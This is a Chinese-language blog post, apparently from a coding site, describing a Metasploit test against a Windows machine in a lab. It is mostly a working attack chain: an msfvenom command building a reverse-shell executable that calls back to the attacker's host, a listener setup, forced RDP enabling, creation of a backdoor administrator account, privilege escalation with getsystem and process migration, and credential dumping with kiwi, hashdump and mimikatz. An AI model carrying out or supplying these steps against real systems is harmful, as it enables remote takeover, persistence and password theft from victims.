当前位置: 代码网 > it编程>前端脚本>Python > MSF回弹木马windows测试

MSF回弹木马windows测试

2024年08月03日 Python 我要评论
使用python3 -m http.server 9999来传递文件到windows主机中。管理员账号需在“此电脑”的“管理”的“当地用户和用户组”中打开登录选项,并设置好密码。kali系统中使用msfvenom命令生成windows系统的回弹木马。可以使用管理员账号登录或新建一个用户用于登录,但是新建的用户权限较低。可以查看到自己的权限还是很高的,属于Administrators组。因为打开了3389,所以可以使用本机的远程桌面来连接。查看端口,发现远程登录端口3389并没有打开。

windows主机地址为192.168.104.133

kali系统中使用msfvenom命令生成windows系统的回弹木马

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.104.131  lport=12345  -f exe -o shellreverse.exe

使用python3 -m http.server 9999来传递文件到windows主机中 

msfconsole

使用mfs开启监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.104.131
set lport 12345
exploit

此时我们可以查看我们的uid

getuid

使用shell命令进行查看:
 

shell

进入shell环境进行查看:

net user

net user wym

可以查看到自己的权限还是很高的,属于administrators组

查看端口,发现远程登录端口3389并没有打开

使用命令强行打开3389端口:

run post/windows/manage/enable_rdp

强开端口后就可以进行远程登录

可以使用管理员账号登录或新建一个用户用于登录,但是新建的用户权限较低

管理员账号需在“此电脑”的“管理”的“当地用户和用户组”中打开登录选项,并设置好密码

新建用户:

net user test test123 /add

第一个字符串为账号,第二个字符串为密码

把新用户放到管理员组中去提高权限

net localgroup administrators test /add

因为打开了3389,所以可以使用本机的远程桌面来连接

也可以找到管理员密码来进行登录

使用mimikatz工具:

load kiwi

 使用hashdump来查看hash后的密码

使用help可以查看kiwi的用处

 但是查看密码时会发现权限不够,所以可以使用msf中的getsystem来提权(使用windows中的0day来进行提权,看它是否打了补丁)

getsystem

如果成功了,就可以抓取新的密码了。当然因为当前进程拥有者还是自己,可能还是会失败。所以可以使用 migrate 来迁移进程,来提高权限。

如果把自己的进程迁移到administrator后还是失败。可以考虑是不是mimikatz的版本问题。从github下载新的mimikatz后(远程调控把自己的磁盘加载进去可以把文件放入)放入windows受害机中,然后解压打开它的命令行页面输入mimikatz.exe启动软件使用privilege::debug命令加载权限,再使用sekurlsa::logonpasswords看看版本够不够,有可能版本不够低,需要更换更老的版本

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com